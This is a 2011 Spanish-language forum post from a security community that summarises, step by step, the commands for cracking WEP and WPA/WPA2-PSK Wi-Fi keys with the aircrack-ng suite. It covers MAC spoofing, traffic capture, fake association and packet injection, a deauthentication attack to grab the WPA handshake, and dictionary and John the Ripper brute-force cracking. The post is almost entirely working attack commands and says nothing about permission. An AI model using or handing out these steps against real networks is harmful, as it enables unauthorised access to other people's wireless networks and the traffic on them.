Tu comunidad de Seguridad Informatica

Crackear WEP's - WPA/WPA2/PSK [Resumen de Codigos] Info1810 Para ver Todo el contenido del foro es necesario estar Registrado! Crackear WEP's - WPA/WPA2/PSK [Resumen de Codigos] Info1810
Crackear WEP's - WPA/WPA2/PSK [Resumen de Codigos] Info1810 Antes de comentar o Aportar es Obligado Leer Las: Reglas | Rules Crackear WEP's - WPA/WPA2/PSK [Resumen de Codigos] Info1810
Crackear WEP's - WPA/WPA2/PSK [Resumen de Codigos] Info1810Ya Esta Disponible al publico "LeProject" el Videojuego del Foro Click Aquí Para Ver el Post. Crackear WEP's - WPA/WPA2/PSK [Resumen de Codigos] Info1810
Crackear WEP's - WPA/WPA2/PSK [Resumen de Codigos] Info1810Pitbull Security Labs "Extras" Esta Disponible! [ENTRA]Crackear WEP's - WPA/WPA2/PSK [Resumen de Codigos] Info1810

No estás conectado. Conéctate o registrate

Ver el tema anterior Ver el tema siguiente Ir abajo  Mensaje [Página 1 de 1.]

1-Slandg- 

-Slandg-
Administrador
Administrador

http://www.pitbullsecurity.org
Sáb Jul 09, 2011 3:59 pm
Crackear WEP's - WPA/WPA2/PSK [Resumen de Codigos] 11754c9c17d1d3a18
1. WEP`s:

NOTA: En todos los casos reemplazar:
XXXX: Interface
ZZZZ: Canal
YYYY: MAC BSSID
RRR: ESSID


1.1. Cambiar la MAC:

A. airmon-ng (Ver la interface que usamos)
B. airmon-ng stop XXXX (Detenemos el modo monitor)
C. ifconfig XXXX down (Tiramos nuestra interface)
D. macchanger --mac 00:11:22:33:44:55 XXXX (Cambiamos nuestra MAC, en este caso sera 00:11:22:33:44:55)
E. airmon-ng start XXXX (Volvemos a iniciar el modo monitor)



1.2. Buscar Redes:

F. airodump-ng XXXX ( Scannea Redes)
G. CTRL + C (Detiene el scanneo)
H. airodump-ng -c ZZZZ -w datas --bssid YYYY XXXX (Capturamos #DATAs) [No cerrar consola]



1.3. Asociandonos a la red (En otra consola):

I. aireplay-ng -1 0 -a YYYY -h 00:11:22:33:44:55 -e RRR XXXX (Asociacion con la red)



1.4 Inyectando Trafico:

J. aireplay-ng -3 -b YYYY -h 00:11:22:33:44:55 XXXX (Captura Datas a mas velocidad)



1.5. Desencriptando la Clave (En otra consola):

K. aircrack-ng datas-01.cap (Desencripta la clave con Aircrack)



2. WPA/WPA2/PSK:

NOTA: En todos los casos reemplazar:XXXX: Interface
ZZZZ: Canal
YYYY: MAC BSSID
RRR: Interface modo monitor
TTTT: Station



2.1. Colocar la interface en modo monitor

A. aimon-ng (Saber nuestra Interface)
B. airmon-ng start XXXX (Colocamos en modo monitor nuestra Interface)



2.2. Capturando el Handshake:

C. airodump-ng RRR (Scannea redes)
D. CTRL + C (Frena el scanneo)
E. airodump-ng RRR --channel 1 --bssid YYYY -w /tmp/wpa2 (Guardara los *.cap en el directorio que le indicamos)
F. aireplay-ng -0 1 -a YYYY -c TTTT RRR(Comenzara la captura del Handshake)



2.3 Obteniendo la Clave:

G.1. aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b YYYY /tmp/wpa2*.cap (Saca la Pass por Diccionario)
G.2. /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b YYYY -w - /tmp/wpa2*.cap (Saca la Pass por Fuerza Bruta con John The Ripper)

Código:
Gracias Antrax

Ver el tema anterior Ver el tema siguiente Volver arriba  Mensaje [Página 1 de 1.]

Permisos de este foro:
No puedes responder a temas en este foro.